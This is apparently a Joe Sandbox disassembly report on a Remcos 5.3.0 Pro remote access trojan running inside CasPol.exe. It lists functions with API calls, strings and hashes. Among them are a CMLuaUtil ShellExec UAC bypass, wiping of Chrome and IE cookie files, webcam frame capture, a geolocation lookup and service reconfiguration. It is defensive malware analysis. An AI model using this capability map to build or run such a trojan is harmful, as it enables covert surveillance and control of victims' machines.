Opcode Fuzzy Hash: cb8f7ca8a171defcb3766c71ed5ef1c67b5ed23ec682f857e370b1562df754d8
Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758

Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F885
_free.LIBCMT ref: 0044F893
_free.LIBCMT ref: 0044F9C1
_free.LIBCMT ref: 0044F9CC

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7c9beb2791b6ce89b88df1f42b01a9acb1f91b5f19b960fb620ecff1e548522d
Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
Opcode Fuzzy Hash: 7c9beb2791b6ce89b88df1f42b01a9acb1f91b5f19b960fb620ecff1e548522d
Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59

Function 00443F8B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41

_free.LIBCMT ref: 00444096
_free.LIBCMT ref: 004440AD
_free.LIBCMT ref: 004440CC
_free.LIBCMT ref: 004440E7
_free.LIBCMT ref: 004440FE

Strings

Z7D, xrefs: 00443FBB, 0044413D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: Z7D
API String ID: 3033488037-2145146825
Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88

Function 0044A0D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A115
__fassign.LIBCMT ref: 0044A190
__fassign.LIBCMT ref: 0044A1AB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1D1
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A

Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 004017F4

Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571

waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902

Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB

__Init_thread_footer.LIBCMT ref: 004017BC

Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C

Strings

>G, xrefs: 0040180B
T=G, xrefs: 00401800
>G, xrefs: 0040188E

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: T=G$>G$>G
API String ID: 1596592924-1617985637
Opcode ID: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
Opcode Fuzzy Hash: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E

Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1

Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31

Strings

DG, xrefs: 00412CF8
DG, xrefs: 00412DFF
>G, xrefs: 00412CF0
TUFTUF, xrefs: 00412E2D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: TUFTUF$>G$DG$DG
API String ID: 3114080316-344394840
Opcode ID: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
Opcode Fuzzy Hash: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE

Function 00437A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00437ABB
___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
_ValidateLocalCookies.LIBCMT ref: 00437B51
__IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
_ValidateLocalCookies.LIBCMT ref: 00437BD1

Strings

csm, xrefs: 00437B66

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95

Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
PathFileExistsA.SHLWAPI(?), ref: 0040B779

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040B703
[IE cookies not found], xrefs: 0040B741
[IE cookies cleared!], xrefs: 0040B7C6, 0040B7E6
Cookies, xrefs: 0040B6FE

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
Opcode Fuzzy Hash: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE

Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669

Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
int.LIBCPMT ref: 0040FC0F

Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B

std::_Facet_Register.LIBCPMT ref: 0040FC4B
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D

Strings

p[G, xrefs: 0040FC94

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: p[G
API String ID: 2536120697-440918510
Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D

Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
InternetCloseHandle.WININET(00000000), ref: 0041A5C3
InternetCloseHandle.WININET(00000000), ref: 0041A5C6

Strings

http://geoplugin.net/json.gp, xrefs: 0041A55E

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
Opcode Fuzzy Hash: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA

Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B

_free.LIBCMT ref: 0044FD39

Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD

_free.LIBCMT ref: 0044FD44
_free.LIBCMT ref: 0044FD4F
_free.LIBCMT ref: 0044FDA3
_free.LIBCMT ref: 0044FDAE
_free.LIBCMT ref: 0044FDB9
_free.LIBCMT ref: 0044FDC4

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655

Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835

Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9

CoUninitialize.OLE32 ref: 0040688E

Strings

[+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 00406815, 00406818, 0040686A
[+] ShellExec success, xrefs: 00406873
[+] before ShellExec, xrefs: 00406856

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: InitializeObjectUninitialize_wcslen
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 3851391207-2637227304
Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669

Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
int.LIBCPMT ref: 0040FEF2

Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B

std::_Facet_Register.LIBCPMT ref: 0040FF2E
std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
__CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70

Strings

h]G, xrefs: 0040FEEA

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: h]G
API String ID: 2536120697-1579725984
Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
Opcode Fuzzy Hash: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789

Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
GetLastError.KERNEL32 ref: 0040B2EE

Strings

UserProfile, xrefs: 0040B2B4
[Chrome Cookies not found], xrefs: 0040B308
[Chrome Cookies found, cleared!], xrefs: 0040B314
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
Opcode Fuzzy Hash: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE

Function 0041BEC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00474358), ref: 0041BEC9
ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07

Strings

CONOUT$, xrefs: 0041BEF5
5.3.0 Pro, xrefs: 0041BF30
Remcos v, xrefs: 0041BF22

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Console$AllocOutputShowWindow
String ID: Remcos v$5.3.0 Pro$CONOUT$
API String ID: 2425139147-2527699604
Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D

Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON

Download Yara Rule

Strings

(CG, xrefs: 0040693F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 00406927
BG, xrefs: 00406909

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
API String ID: 0-3292752334
Opcode ID: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
Opcode Fuzzy Hash: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C

Function 00419F42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
Sleep.KERNEL32(00002710), ref: 00419F89
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92

Strings

`#v, xrefs: 00419F74
Alarm triggered, xrefs: 00419F4B

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered$`#v
API String ID: 614609389-3049340936
Opcode ID: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
Opcode Fuzzy Hash: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB

Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00439799
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
__allrem.LIBCMT ref: 004397CC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
__allrem.LIBCMT ref: 00439801
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758

Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00444B79
__cftoe.LIBCMT ref: 00444BAB

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: dd2f1bd308eb93d0c4e5b61de7cd89d13f43cbfcc6682a20ed2fda671c880afe
Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
Opcode Fuzzy Hash: dd2f1bd308eb93d0c4e5b61de7cd89d13f43cbfcc6682a20ed2fda671c880afe
Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D

Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00403E8A

Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2

Strings

OpenCamera, xrefs: 00403F48
P>G, xrefs: 00403FAC
GetFrame, xrefs: 00403F65
FreeFrame, xrefs: 00403F76
CloseCamera, xrefs: 00403F54

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
API String ID: 3469354165-462540288
Opcode ID: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
Opcode Fuzzy Hash: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF

Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9

Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D

Memory Dump Source

Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
